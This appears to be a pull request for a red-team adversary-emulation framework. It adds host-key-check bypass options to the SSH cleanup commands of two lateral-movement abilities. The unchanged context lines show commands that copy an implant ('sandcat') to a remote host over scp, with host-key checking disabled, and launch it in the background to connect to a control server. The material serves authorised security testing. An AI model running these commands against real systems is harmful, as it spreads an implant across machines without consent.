### PR TITLE
Fixes missing SSH hostkeycheck disable

### DIFF
--- a/data/abilities/lateral-movement/10a9d979-e342-418a-a9b0-002c483e0fa6.yml
+++ b/data/abilities/lateral-movement/10a9d979-e342-418a-a9b0-002c483e0fa6.yml
@@ -21,6 +21,6 @@
           scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-linux #{remote.ssh.cmd}:~/sandcat.go &&
           ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'
         cleanup: |
-          ssh -o ConnectTimeout=3 #{remote.ssh.cmd} 'pkill -f sandcat & rm -f ~/sandcat.go'
+          ssh -o ConnectTimeout=3 -o StrictHostKeyChecking=no #{remote.ssh.cmd} 'pkill -f sandcat & rm -f ~/sandcat.go'
         payloads:
         - sandcat.go-linux

--- a/data/abilities/lateral-movement/4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml
+++ b/data/abilities/lateral-movement/4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml
@@ -51,6 +51,6 @@
         command: |
           scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-linux #{remote.ssh.cmd}:~/sandcat.go
         cleanup: |
-          ssh -o ConnectTimeout=3 #{remote.ssh.cmd} 'rm -f sandcat.go'
+          ssh -o ConnectTimeout=3 -o StrictHostKeyChecking=no #{remote.ssh.cmd} 'rm -f sandcat.go'
         payloads:
         - sandcat.go-linux


### PR DESCRIPTION
Fixes abilities 'Start 54ndc47' and 'Copy 54ndc47 (WinRM and SCP)'
SSH cleanup commands now also have StrictHostKeyChecking=no option

The cleanup commands of above abilities were missing the `-o StrictHostKeyChecking=no` option, leading to the command failing:
![delete_sandcat_hostkey](https://user-images.githubusercontent.com/30846672/81476548-bb707f00-9212-11ea-93db-3b2c838beee9.png)

This PR introduces the missing option in both abilities.